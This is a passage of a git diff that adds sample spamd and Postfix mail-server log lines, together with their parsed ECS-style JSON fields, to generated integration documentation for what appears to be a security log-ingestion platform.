scantime=3.4,size=120289,user=debian-spamd,uid=119,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=44944,mid=<11111111111111@uexample.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<11111111111111@uexample.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 44944 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd10.json" + + ```json + + { + "message": "spamd: result: . -1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,FORGED_HOTMAIL_RCVD2,FREEMAIL_FROM,HTML_IMAGE_RATIO_04,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=2.7,size=102578,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45880,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 45880 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd11.json" + + ```json + + { + "message": "spamd: result: . -1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,FREEMAIL_ENVFROM_END_DIGIT,FREEMAIL_FROM,FREEMAIL_REPLYTO_END_DIGIT,HTML_MESSAGE,MIME_HTML_ONLY,RCVD_IN_DNSWL_NONE,SPF_HELO_PASS,SPF_PASS,T_FREEMAIL_DOC_PDF scantime=4.7,size=2252595,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=49594,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 49594 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd12.json" + + ```json + + { + "message": "spamd: result: . -1 - DMARC_PASS,MIME_HEADER_CTYPE_ONLY,MISSING_DATE,MISSING_MID,SPF_HELO_NONE,SPF_PASS scantime=3.3,size=4260,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=46436,mid=(unknown),autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "(unknown)" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 46436 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd13.json" + + ```json + + { + "message": "spamd: result: . -1 - FREEMAIL_ENVFROM_END_DIGIT,FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=2.6,size=8094,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=39504,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 39504 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd14.json" + + ```json + + { + "message": "spamd: result: . -1 - FREEMAIL_FORGED_FROMDOMAIN,FREEMAIL_FROM,HEADER_FROM_DIFFERENT_DOMAINS,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_NONE,SPF_PASS scantime=2.8,size=61589,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=37172,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 37172 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd15.json" + + ```json + + { + "message": "spamd: result: . -1 - HTML_FONT_LOW_CONTRAST,HTML_IMAGE_RATIO_08,HTML_MESSAGE,LOTS_OF_MONEY,MIME_HTML_MOSTLY,MPART_ALT_DIFF,RCVD_IN_MSPIKE_H4,RCVD_IN_MSPIKE_WL,SPF_HELO_NONE,SPF_PASS scantime=3.3,size=164381,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=56082,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 56082 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd16.json" + + ```json + + { + "message": "spamd: result: . -1 - HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,HTML_OBFUSCATE_05_10,MIME_HTML_ONLY,SPF_HELO_PASS,SPF_PASS scantime=2.5,size=1572,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=51336,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 51336 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd17.json" + + ```json + + { + "message": "spamd: result: . -6 - DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_MESSAGE,RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS scantime=2.6,size=7882,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=33278,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 33278 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd18.json" + + ```json + + { + "message": "spamd: connection from test.com [127.0.0.1]:33620 to port 783, fd 5", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "port": 783 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "test.com" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "test.com", + "domain": "test.com", + "ip": "127.0.0.1", + "port": 33620, + "registered_domain": "test.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_spamd19.json" + + ```json + + { + "message": "spamd: connection from mx.example.org [127.0.0.1]:33620 to port 783, fd 5", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "port": 783 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "127.0.0.1", + "port": 33620, + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_spamd2.json" + + ```json + + { + "message": "spamd: connection from example.org [127.0.0.1]:53684 to port 783, fd 5", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "port": 783 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "ip": "127.0.0.1", + "port": 53684, + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_spamd20.json" + + ```json + + { + "message": "spamd: processing message for debian-spamd:118", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "!&!AAAAAAAAAAAYAAAAAAAAA111111111111111111111111111111111/22222222222222/u47tEBAAAAAA==@example.org" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_spamd21.json" + + ```json + + { + "message": "spamd: processing message for debian-spamd:117", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "!&!AAAAAAAAAAAuAAAAAAAAAOC333333333333333333333333333333333333333q555555555555555555555555555555555555555555555555=@yahoo.fr" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_spamd22.json" + + ```json + + { + "message": "spamd: processing message <0113018ecc14540b-4a312890-d3e4-4332-887c-1d5be7521aa1-000000@eu-west-3.amazonses.com> for debian-spamd:118", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "0113018ecc14540b-4a312890-d3e4-4332-887c-1d5be7521aa1-000000@eu-west-3.amazonses.com" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_spamd23.json" + + ```json + + { + "message": "spamd: processing message <55555555555555555555555555555555555-8nmAAKsF_9_U+fg@mail.gmail.com> for debian-spamd:118", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "55555555555555555555555555555555555-8nmAAKsF_9_U+fg@mail.gmail.com" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_spamd24.json" + + ```json + + { + "message": "spamd: processing message <66666666666666666666666666666666666666@EXAMPLE.PROD.OUTLOOK.COM> for debian-spamd:117", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "66666666666666666666666666666666666666@EXAMPLE.PROD.OUTLOOK.COM" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_spamd3.json" + + ```json + + { + "message": "spamd: result: . -1 - AC_DIV_BONANZA,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H3,RCVD_IN_MSPIKE_WL,SPF_HELO_NONE,SPF_PASS,URI_NOVOWEL scantime=3.2,size=209868,user=debian-spamd,uid=117,required_score=5.0,rhost=test.host.test,raddr=127.0.0.1,rport=44702,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "test.host.test" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "test.host.test", + "domain": "test.host.test", + "ip": "127.0.0.1", + "port": 44702, + "subdomain": "test.host" + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd4.json" + + ```json + + { + "message": "spamd: result: . -1 - ANY_BOUNCE_MESSAGE,DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,FORGED_SPF_HELO,HTML_MESSAGE,OOOBOUNCE_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_NONE scantime=2.7,size=14228,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=36236,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 36236 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd5.json" + + ```json + + { + "message": "spamd: result: . -1 - APOSTROPHE_FROM,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_FONT_LOW_CONTRAST,HTML_MESSAGE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=4.9,size=575869,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=41352,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 41352 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd6.json" + + ```json + + { + "message": "spamd: result: . -1 - DEAR_SOMETHING,DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,HTML_MESSAGE,PDS_BTC_ID,RCVD_IN_DNSWL_LOW,SPF_HELO_NONE,SPF_NONE scantime=5.3,size=468649,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=42678,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 42678 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd7.json" + + ```json + + { + "message": "spamd: result: . -1 - DEAR_SOMETHING,DMARC_PASS,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RCVD_IN_DNSWL_LOW,SPF_HELO_NONE,SPF_PASS scantime=2.8,size=3254,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45060,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 45060 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd8.json" + + ```json + + { + "message": "spamd: result: . -1 - DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,FORGED_SPF_HELO,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_NONE scantime=2.3,size=10467,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45920,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 45920 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd9.json" + + ```json + + { + "message": "spamd: result: . -1 - DKIM_INVALID,DKIM_SIGNED,HEADER_FROM_DIFFERENT_DOMAINS,HTML_FONT_LOW_CONTRAST,HTML_MESSAGE,MIME_HTML_ONLY,RCVD_IN_MSPIKE_H2,SPF_HELO_NONE,SPF_PASS,T_REMOTE_IMAGE scantime=2.9,size=65264,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=33254,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 33254 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + @@ -6532,6 +13013,7 @@ The following table lists the fields that are extracted, normalized under the EC |`file.name` | `keyword` | Name of the file including the extension, without the directory. | |`file.size` | `long` | File size in bytes. | |`network.protocol` | `keyword` | Application protocol name. | +|`postfix.headers.from` | `array` | | |`postfix.orig_to` | `keyword` | | |`source.address` | `keyword` | Source network address. | |`source.domain` | `keyword` | The domain name of the source. | diff --git a/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd_sample.md b/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd_sample.md index a2fe9a66dc..0c9310931a 100644 --- a/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd_sample.md +++ b/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd_sample.md @@ -108,6 +108,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "connection_limited_1" + + ``` + 53C2C140E40: host smtp.office365.com[52.97.201.210] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command) + ``` + + + === "counter" ``` @@ -180,6 +188,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "local5" + + ``` + B84078B26C7: to=proxy@example.localdomain, orig_to=sample.orig.to, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "local6" + + ``` + 04B953035FC2: to=john.doe@example.org, orig_to=jane.doe@example.com, relay=127.0.0.1:2525, delay=0.44, delays=0.13/0/0.02/0.29, dsn=2.0.0, status=sent (250 Ok) + ``` + + + === "message_id" ``` @@ -548,6 +572,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "postfix8" + + ``` + D2D459605C: Used TLS for smtp-in.example.com[5.6.7.8]:25 + ``` + + + === "postfix_cleanup1" ``` @@ -692,6 +724,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "replace_header_1" + + ``` + 95BCC140E40: replace: header From: Example Mailbox <[test@example.org](mailto:test@example.org)>: From: [noreply@example.org](mailto:noreply@example.org) + ``` + + + +=== "replace_header_2" + + ``` + 2F46A140256: replace: header From: "Example Help" , relay=none, delay=89758, delays=89758/0.02/0/0, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.corp.com[1.1.1.1]:25: Connection timed out) 215 + ``` + + + +=== "wo_appname_appname_postfix_local" + + ``` + 11FDF5F62A: to=, relay=local, delay=80181, delays=80181/0.02/0/0, dsn=4.0.0, status=deferred (user lookup error) + ``` + + + +=== "wo_appname_bounced" + + ``` + 3D770111AF50: to=, relay=none, delay=1.2, delays=1.1/0/0.03/0, dsn=5.4.4, status=bounced (Host or domain name not found. Name service error for name=corp.com type=AAAA: Host not found) + ``` + + + +=== "wo_appname_cleanup" + + ``` + 77EFFC0015: warning: header Content-Disposition: inline; filename="image003.jpg"; size=26055;??creation-date="Thu, 12 Sep 2019 12:39:01 GMT";??modification-date="Thu, 12 Sep 2019 12:40:01 GMT" from mail.outbound.protection.outlook.com[1.1.1.1]; from=<> to= proto=ESMTP helo= + ``` + + + +=== "wo_appname_cleanup2" + + ``` + 3D770111AF50: warning: header Subject: Manquants LASTNAME GB Nouvelle version from unknown[10.1.1.1]; from= to= proto=ESMTP helo= + ``` + + + +=== "wo_appname_cleanup3" + + ``` + 2CE6C111AF50: warning: header Subject: =?ISO-8859-1?Q?Pb_FTP_=3A_999_Aucune_action_effectu=E9e?= from unknown[10.1.1.1]; from= to= proto=ESMTP helo= 279 + ``` + + + +=== "wo_appname_cleanup4" + + ``` + B4B613F8B7: warning: header Content-Disposition: inline; filename="image001.png"; size=8879;??creation-date="Thu, 14 Mar 2024 10:19:00 GMT";??modification-date="Thu, 14 Mar 2024 10:19:00 GMT" from subdomain.key.corp.com[1.1.1.1]; from= to= proto=ESMTP helo= + ``` + + + +=== "wo_appname_cleanup5" + + ``` + 707A12000A: warning: header Content-Disposition: attachment;??filename="?iso-8859-2?q?representative_on_migration.pdf?="; size=259210;?? from local; from= to= + ``` + + + +=== "wo_appname_client" + + ``` + 486D13F8B7: client=COMPUTER.sub.corp.com[1.1.1.1] + ``` + + + +=== "wo_appname_client_address_field_with_mask" + + ``` + 8116C5F683: action=pass, reason=client whitelist, client_name=mail-corp123.outbound.protection.outlook.com, client_address=1.1.1.1/32, sender=firstname.lastname@corp.fr, recipient=firstname.lastname@corp2.fr + ``` + + + +=== "wo_appname_connect" + + ``` + disconnect from unknown[1.1.1.1] ehlo=1 mail=1 rcpt=0/1 quit=1 commands=3/4 + ``` + + + +=== "wo_appname_connection_limited" + + ``` + 53C2C140E40: host smtp.office365.com[1.1.1.1] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=P212321.PROD.OUTLOOK.COM] (in reply to end of DATA command) + ``` + + + +=== "wo_appname_connection_limited_1" + + ``` + 53C2C140E40: host smtp.office365.com[52.97.201.210] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command) + ``` + + + +=== "wo_appname_counter" + + ``` + disconnect from localhost[127.0.0.1] ehlo=2 starttls=1 mail=1 rcpt=1 data=1 quit=1 commands=7 + ``` + + + +=== "wo_appname_counter2" + + ``` + disconnect from localhost[127.0.0.1] ehlo=2 starttls=1 mail=1 rcpt=1 data=1 quit=1 commands=7 93 + ``` + + + +=== "wo_appname_counter3" + + ``` + disconnect from unknown[1.1.1.1] ehlo=1 mail=1 rcpt=2 data=1 quit=1 commands=6 137 + ``` + + + +=== "wo_appname_delivered_via_spamfilter" + + ``` + EF0B15F675: to=, relay=spamfilter, delay=4.2, delays=1.6/0/0/2.6, dsn=2.0.0, status=sent (delivered via spamfilter service) 148 + ``` + + + +=== "wo_appname_dns" + + ``` + dns: new_dns_packet: domain is utf8 flagged: ns1.example.org + ``` + + + +=== "wo_appname_local1" + + ``` + 175127B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "wo_appname_local2" + + ``` + 1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service) + ``` + + + +=== "wo_appname_local3" + + ``` + 7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17) + ``` + + + +=== "wo_appname_local4" + + ``` + B84078B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "wo_appname_local5" + + ``` + B84078B26C7: to=proxy@example.localdomain, orig_to=sample.orig.to, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "wo_appname_local6" + + ``` + 04B953035FC2: to=john.doe@example.org, orig_to=jane.doe@example.com, relay=127.0.0.1:2525, delay=0.44, delays=0.13/0/0.02/0.29, dsn=2.0.0, status=sent (250 Ok) + ``` + + + +=== "wo_appname_message_id" + + ``` + 476295F5AD: message-id= + ``` + + + +=== "wo_appname_message_id2" + + ``` + 123456789: message-id= + ``` + + + +=== "wo_appname_noqueue" + + ``` + NOQUEUE: filter: RCPT from foo.key.corp.com[192.168.1.1]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo= 294 + ``` + + + +=== "wo_appname_noqueue2" + + ``` + NOQUEUE: filter: RCPT from HOSTNAME.key.corp.com[192.168.1.1]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo= 299 + ``` + + + +=== "wo_appname_nospam" + + ``` + Anonymous TLS connection established to example.org[1.2.3.4]:25: TLSv1.2 with cipher ADH-AES256-GCM-SHA384 (256/256 bits) + ``` + + + +=== "wo_appname_pass" + + ``` + action=pass, reason=triplet found, delay=2400, client_name=mordor.com, client_address=1.1.1.1, sender=mechant@mordor.com, recipient=Pipin.touque@lacomte.net + ``` + + + +=== "wo_appname_pass2" + + ``` + action=pass, reason=client AAA, client_name=example.com, client_address=1.2.3.4, sender=Coyotte@acme.com, recipient=BIPBIP.NEWMAN@acme.com + ``` + + + +=== "wo_appname_pickup1" + + ``` + E43D43F838: uid=117 from= + ``` + + + +=== "wo_appname_pipe1" + + ``` + 175127B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "wo_appname_pipe2" + + ``` + 1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service) + ``` + + + +=== "wo_appname_pipe3" + + ``` + 7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17) + ``` + + + +=== "wo_appname_policydspf1" + + ``` + Action: prepend: Text: Received-SPF: Permerror (mailfrom) identity=mailfrom; client-ip=1.1.1.1; helo=corp.com; envelope-from=ops@corp.com; receiver= Reject action: 550 5.7.23 210 + ``` + + + +=== "wo_appname_policydspf10" + + ``` + Action: prepend: Text: Received-SPF: Pass (sender SPF authorized) identity=helo; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=<>; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_policydspf11" + + ``` + Action: prepend: Text: Received-SPF: Softfail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=noreply@example.com; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_policydspf12" + + ``` + Neutral; identity=mailfrom; client-ip=1.2.3.4; helo=example.mail.protection.outlook.com; envelope-from=john.doem@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf13" + + ``` + None; identity=helo; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf14" + + ``` + Pass; identity=helo; client-ip=1.2.3.4; helo=mail.example.org; envelope-from=<>; receiver= + ``` + + + +=== "wo_appname_policydspf15" + + ``` + Pass; 